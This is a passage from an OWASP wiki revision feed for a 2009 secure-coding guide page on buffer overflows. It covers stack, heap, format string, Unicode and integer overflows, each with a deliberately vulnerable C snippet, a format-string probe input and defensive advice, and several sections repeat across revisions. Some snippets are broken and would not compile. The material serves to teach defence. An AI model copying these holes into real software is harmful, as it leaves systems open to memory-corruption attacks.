## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are a bit more difficult to do than typical buffer overflows as demonstrated in Anley’s 2002 paper, but it is wrong to assume that by using Unicode, you are protected against buffer overflows. Examples of Unicode overflows include Code Red, a devastating Trojan with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and perform an operation with them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and stored into another 8-bit byte, the result will not fit into an 8-bit result:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Although such an operation will usually cause some type of exception, your application must be coded to check for such an exception and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]: [[Category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65580 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the input value (65580), but rather the value after it has been converted to an unsigned short (45). &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero value for integer values, particular during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* w00 w00 and Matt Conover, ''Preliminary Heap Overflow Tutorial''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Chris Anley, ''Creating Arbitrary Shellcode In Unicode Expanded Strings''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ngssoftware.com/papers/unicodebo.pdf&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* David Leblanc, ''Integer Handling with the C++ SafeInt Class ''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure01142004.asp&amp;lt;/u&amp;gt;     &lt;br /&gt;
&lt;br /&gt;
* Aleph One, ''Smashing the Stack for fun and profit''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.phrack.org/phrack/49/P49-14&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Mark Donaldson, ''Inside the buffer Overflow Attack: Mechanism, method, &amp;amp; prevention''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://rr.sans.org/code/inside_buffer.php&amp;lt;/u&amp;gt;   [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* ''NX Bit'', Wikipedia article&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://en.wikipedia.org/wiki/NX_bit&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Horizon'', How to bypass Solaris no execute stack protection&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.secinf.net/unix_security/How_to_bypass_Solaris_nonexecutable_stack_protection_.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Alexander Anisimov'', Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass'', Positive Technologies&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.maxpatrol.com/defeating-xpsp2-heap-protection.htm&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Matt Conover, w00w00 on Heap Overflows, w00w00 Security Team&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.w00w00.org/files/articles/heaptut.txt&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Blexim, ''Basic Integer Overflows&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.phrack.org/phrack/60/p60-0x0a.txt&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* StackShield&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.angelfire.com/sk/stackshield/index.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* StackGuard&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.immunix.org&amp;lt;/u&amp;gt;[[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Libsafe&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.research.avayalabs.com/project/libsafe&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59854</id>
		<title>Buffer Overflows</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_Overflows&amp;diff=59854"/>
				<updated>2009-05-02T11:44:21Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Integer Overflow */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__'''&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that:&lt;br /&gt;
&lt;br /&gt;
* Applications do not expose themselves to faulty components.&lt;br /&gt;
&lt;br /&gt;
* Applications create as few buffer overflows as possible.&lt;br /&gt;
&lt;br /&gt;
* Developers are encouraged to use languages and frameworks that are relatively immune to buffer overflows.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
Almost every platform, with the following notable exceptions:&lt;br /&gt;
&lt;br /&gt;
* Java/J2EE – as long as native methods or system calls are not invoked.&lt;br /&gt;
&lt;br /&gt;
* .NET – as long as unsafe or unmanaged code is not invoked (such as the use of P/Invoke or COM Interop).&lt;br /&gt;
&lt;br /&gt;
* PHP, Python, Perl – as long as external programs or vulnerable extensions are not used.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity.&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Attackers generally use [[Buffer Overflow|buffer overflows]] to corrupt the execution stack of a web application. By sending carefully crafted input to a web application, an attacker can cause the web application to execute arbitrary code, possibly taking over the machine. Attackers have managed to identify buffer overflows in a staggering array of products and components. &lt;br /&gt;
&lt;br /&gt;
Buffer overflow flaws can be present in both the web server and application server products that serve the static and dynamic portions of a site, or in the web application itself. Buffer overflows found in commonly-used server products are likely to become widely known and can pose a significant risk to users of these products. When web applications use libraries, such as a graphics library to generate images or a communications library to send e-mail, they open themselves to potential buffer overflow attacks. Literature detailing buffer overflow attacks against commonly-used products is readily available, and newly discovered vulnerabilities are reported almost daily. &lt;br /&gt;
&lt;br /&gt;
Buffer overflows can also be found in custom web application code, and may even be more likely, given the lack of scrutiny that web applications typically go through. Buffer overflow attacks against customized web applications can sometimes lead to interesting results. In some cases, we have discovered that sending large inputs can cause the web application or the back-end database to malfunction. It is possible to cause a denial of service attack against the web site, depending on the severity and specific nature of the flaw. Overly large inputs could cause the application to display a detailed error message, potentially leading to a successful attack on the system.&lt;br /&gt;
&lt;br /&gt;
Buffer overflow attacks generally rely upon two techniques (and usually the combination):&lt;br /&gt;
&lt;br /&gt;
* Writing data to particular memory addresses&lt;br /&gt;
&lt;br /&gt;
* Having the operating system mishandle data types&lt;br /&gt;
&lt;br /&gt;
* This means that strongly-typed programming languages (and environments) that disallow direct memory access usually prevent buffer overflows from happening.&lt;br /&gt;
&lt;br /&gt;
{| border=1&lt;br /&gt;
|-&lt;br /&gt;
 ! Language/Environment !! Compiled or Interpreted !! Strongly Typed !! Direct Memory Access !! Safe or Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Java, Java Virtual Machine (JVM) || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || .NET || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Perl  || Both || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Python - interpreted || Intepreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Ruby || Interpreted || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || C/C++ || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || Assembly || Compiled || No || Yes || Unsafe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
 || COBOL || Compiled || Yes || No || Safe&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
Table 8.1: Language descriptions&lt;br /&gt;
&lt;br /&gt;
==General Prevention Techniques ==&lt;br /&gt;
&lt;br /&gt;
A number of general techniques to prevent buffer overflows include:&lt;br /&gt;
&lt;br /&gt;
* Code auditing (automated or manual)&lt;br /&gt;
&lt;br /&gt;
* Developer training – bounds checking, use of unsafe functions, and group standards&lt;br /&gt;
&lt;br /&gt;
* Non-executable stacks – many operating systems have at least some support for this&lt;br /&gt;
&lt;br /&gt;
* Compiler tools – StackShield, StackGuard, and Libsafe, among others&lt;br /&gt;
&lt;br /&gt;
* Safe functions – use strncat instead of strcat, strncpy instead of strcpy, etc&lt;br /&gt;
&lt;br /&gt;
* Patches – Be sure to keep your web and application servers fully patched, and be aware of bug reports relating to applications upon which your code is dependent.&lt;br /&gt;
&lt;br /&gt;
* Periodically scan your application with one or more of the commonly available scanners that look for buffer overflow flaws in your server products and your custom web applications. &lt;br /&gt;
&lt;br /&gt;
==Stack Overflow ==&lt;br /&gt;
&lt;br /&gt;
Stack overflows are the best understood and the most common form of buffer overflows. The basics of a stack overflow is simple:&lt;br /&gt;
&lt;br /&gt;
* There are two buffers, a source buffer containing arbitrary input (presumably from the attacker), and a destination buffer that is too small for the attack input. The second buffer resides on the stack and somewhat adjacent to the function return address on the stack.&lt;br /&gt;
&lt;br /&gt;
* The faulty code does ''not'' check that the source buffer is too large to fit in the destination buffer. It copies the attack input to the destination buffer, overwriting additional information on the stack (such as the function return address).&lt;br /&gt;
&lt;br /&gt;
* When the function returns, the CPU unwinds the stack frame and pops the (now modified) return address from the stack.&lt;br /&gt;
&lt;br /&gt;
* Control does not return to the function as it should. Instead, arbitrary code (chosen by the attacker when crafting the initial input) is executed. &lt;br /&gt;
&lt;br /&gt;
The following example, written in C, demonstrates a stack overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void f(char* s) {&lt;br /&gt;
    char buffer[10];&lt;br /&gt;
    strcpy(buffer, s);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    f(&amp;quot;01234567890123456789&amp;quot;);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./stacktest&lt;br /&gt;
&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values or non-executable stacks to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Heap Overflow ==&lt;br /&gt;
&lt;br /&gt;
Heap overflows are problematic in that they are not necessarily protected by CPUs capable of using non-executable stacks. A heap is an area of memory allocated by the application at run-time to store data. The following example, written in C, shows a heap overflow exploit.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define BSIZE 16&lt;br /&gt;
 #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */&lt;br /&gt;
&lt;br /&gt;
 void main(void) {&lt;br /&gt;
    u_long b_diff;&lt;br /&gt;
    char *buf0 = (char*)malloc(BSIZE);		// create two buffers&lt;br /&gt;
    char *buf1 = (char*)malloc(BSIZE);&lt;br /&gt;
&lt;br /&gt;
    b_diff = (u_long)buf1 - (u_long)buf0;	// difference between locations&lt;br /&gt;
    printf(&amp;quot;Initial values:  &amp;quot;);&lt;br /&gt;
    printf(&amp;quot;buf0=%p, buf1=%p, b_diff=0x%x bytes\n&amp;quot;, buf0, buf1, b_diff);&lt;br /&gt;
&lt;br /&gt;
    memset(buf1, 'A', BUFSIZE-1), buf1[BUFSIZE-1] = '\0';&lt;br /&gt;
    printf(&amp;quot;Before overflow: buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
&lt;br /&gt;
    memset(buf0, 'B', (u_int)(diff + OVERSIZE));&lt;br /&gt;
    printf(&amp;quot;After overflow:  buf1=%s\n&amp;quot;, buf1);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./heaptest&lt;br /&gt;
&lt;br /&gt;
Initial values:  buf0=0x9322008, buf1=0x9322020, diff=0xff0 bytes&lt;br /&gt;
Before overflow: buf1=AAAAAAAAAAAAAAA&lt;br /&gt;
After overflow:  buf1=BBBBBBBBAAAAAAA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The simple program above shows two buffers being allocated on the heap, with the first buffer being overflowed to overwrite the contents of the second buffer. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language)  that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* copies data from one buffer on the stack to another without checking sizes first AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Format String ==&lt;br /&gt;
&lt;br /&gt;
Format string buffer overflows (usually called &amp;quot;format string vulnerabilities&amp;quot;) are highly specialized buffer overflows that can have the same effects as other buffer overflow attacks. Basically, format string vulnerabilities take advantage of the mixture of data and control information in certain functions, such as C/C++'s printf. The easiest way to understand this class of vulnerability is with an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
#include &amp;lt;unistd.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(void) {&lt;br /&gt;
    char str[100] = scanf(&amp;quot;%s&amp;quot;);&lt;br /&gt;
    printf(&amp;quot;%s&amp;quot;, str);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This simple program takes input from the user and displays it back on the screen. The string &amp;lt;code&amp;gt;%s&amp;lt;/code&amp;gt; means that the other parameter, str, should be displayed as a string. This example is ''not'' vulnerable to a format string attack, but if one changes the last line, it becomes exploitable:&lt;br /&gt;
&lt;br /&gt;
    printf(str);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
To see how, consider the user entering the special input:&lt;br /&gt;
&lt;br /&gt;
''%08x.%08x.%08x.%08x.%08x''&lt;br /&gt;
&lt;br /&gt;
By constructing input as such, the program can be exploited to print the first five entries from the stack.  &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* uses functions such as printf, snprintf directly, or indirectly through system services (such as syslog) or other AND&lt;br /&gt;
&lt;br /&gt;
* the use of such functions allows input from the user to contain control information interpreted by the function itself&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. Specifically check for control information (meta-characters like '%')&lt;br /&gt;
# Avoid the use of functions like printf that allow user input to contain control information&lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Unicode Overflow ==&lt;br /&gt;
&lt;br /&gt;
Unicode exploits are a bit more difficult to do than typical buffer overflows as demonstrated in Anley’s 2002 paper, but it is wrong to assume that by using Unicode, you are protected against buffer overflows. Examples of Unicode overflows include Code Red, a devastating Trojan with an estimated economic cost in the billions of dollars. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
If your program:&lt;br /&gt;
&lt;br /&gt;
* is written in a language (or depends upon a program that is written in a language) that allows buffer overflows to be created (see Table 8.1) AND&lt;br /&gt;
&lt;br /&gt;
* takes Unicode input from a user AND&lt;br /&gt;
&lt;br /&gt;
* fails to sanitize the input AND&lt;br /&gt;
&lt;br /&gt;
* does not use techniques such as canary values to prevent buffer overflows THEN&lt;br /&gt;
&lt;br /&gt;
it is highly likely that the application is vulnerable to attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself  ===&lt;br /&gt;
&lt;br /&gt;
# Deploy on systems capable of using non-executable stacks, such as:&lt;br /&gt;
## AMD and Intel x86-64 chips with associated 64-bit operating systems&lt;br /&gt;
## Windows XP SP2 (both 32- and 64-bit)&lt;br /&gt;
## Windows 2003 SP1 (both 32- and 64-bit)&lt;br /&gt;
## Linux after 2.6.8 on AMD and x86-64 processors in 32- and 64-bit mode&lt;br /&gt;
## OpenBSD (w^x on Intel, AMD, SPARC, Alpha and PowerPC)&lt;br /&gt;
## Solaris 2.6 and later with the “noexec_user_stack” flag enabled&lt;br /&gt;
# Use higher-level programming languages that are strongly typed and that disallow direct memory access. &lt;br /&gt;
# Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing &amp;quot;junk&amp;quot; characters, etc. &lt;br /&gt;
# If relying upon operating system functions or utilities written in a vulnerable language, ensure that they:&lt;br /&gt;
## use the principle of least privilege&lt;br /&gt;
## use compilers that protect against stack and heap overflows&lt;br /&gt;
## are current in terms of patches&lt;br /&gt;
&lt;br /&gt;
==Integer Overflow ==&lt;br /&gt;
&lt;br /&gt;
When an application takes two numbers of fixed word size and perform an operation with them, the result may not fit within the same word size. For example, if the two 8-bit numbers 192 and 208 are added together and stored into another 8-bit byte, the result will not fit into an 8-bit result:&lt;br /&gt;
&lt;br /&gt;
''         1100 0000''&lt;br /&gt;
&lt;br /&gt;
''  +      1101 0000''&lt;br /&gt;
&lt;br /&gt;
''  = 0001 1001 0000''&lt;br /&gt;
&lt;br /&gt;
Although such an operation will usually cause some type of exception, your application must be coded to check for such an exception and take proper action. Otherwise, your application would report that 192 + 208 equals 144.&lt;br /&gt;
&lt;br /&gt;
The following code demonstrates a buffer overflow, and was adapted from [http://www.phrack.org/phrack/60/p60-0x0a.txt Blexim's Phrack article]: [[Category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
void main(int argc, char *argv[]) {&lt;br /&gt;
    int i = atoi(argv[1]);         // input from user&lt;br /&gt;
    unsigned short s = i;          // truncate to a short&lt;br /&gt;
    char buf[50];                  // large buffer&lt;br /&gt;
&lt;br /&gt;
    if (s &amp;gt; 10) {                  // check we're not greater than 10&lt;br /&gt;
        return;&lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
    memcpy(buf, argv[2], i);       // copy i bytes to the buffer&lt;br /&gt;
    buf[i] = '\0';                 // add a null byte to the buffer&lt;br /&gt;
    printf(&amp;quot;%s\n&amp;quot;, buf);           // output the buffer contents&lt;br /&gt;
&lt;br /&gt;
    return;&lt;br /&gt;
} &lt;br /&gt;
&lt;br /&gt;
[root /tmp]# ./inttest 65580 foobar&lt;br /&gt;
Segmentation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The above code is exploitable because the validation does not occur on the input value (65580), but rather the value after it has been converted to an unsigned short (45). &lt;br /&gt;
&lt;br /&gt;
Integer overflows can be a problem in any language and can be exploited when integers are used in array indices and implicit short math operations. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Examine use of signed integers, bytes, and shorts.&lt;br /&gt;
&lt;br /&gt;
* Are there cases where these values are used as array indices after performing an arithmetic operation (+, -, *, /, or % (modulo))?&lt;br /&gt;
&lt;br /&gt;
* How would your program react to a negative or zero value for integer values, particular during array lookups?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* If using .NET, use David LeBlanc’s SafeInt class or a similar construct. Otherwise, use a &amp;quot;BigInteger&amp;quot; or &amp;quot;BigDecimal&amp;quot; implementation in cases where it would be hard to validate input yourself.&lt;br /&gt;
&lt;br /&gt;
* If your compiler supports the option, change the default for integers to be unsigned unless otherwise explicitly stated. Use unsigned integers whenever you don't need negative values.&lt;br /&gt;
&lt;br /&gt;
* Use range checking if your language or framework supports it, or be sure to implement range checking yourself after all arithmetic operations.&lt;br /&gt;
&lt;br /&gt;
* Be sure to check for exceptions if your language supports it.&lt;br /&gt;
&lt;br /&gt;
==Further reading ==&lt;br /&gt;
&lt;br /&gt;
* Team Teso, ''Exploiting Format String Vulnerabilities''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html&amp;lt;/u&amp;gt; [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
* Newsham, Tim, ''Format String Attacks&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;u&amp;gt;http://www.lava.net/~newsham/format-string-attacks.pdf&amp;lt;/u&amp;gt;  [[category:FIXME | link not working]]&lt;br /&gt;
&lt;br /&gt;
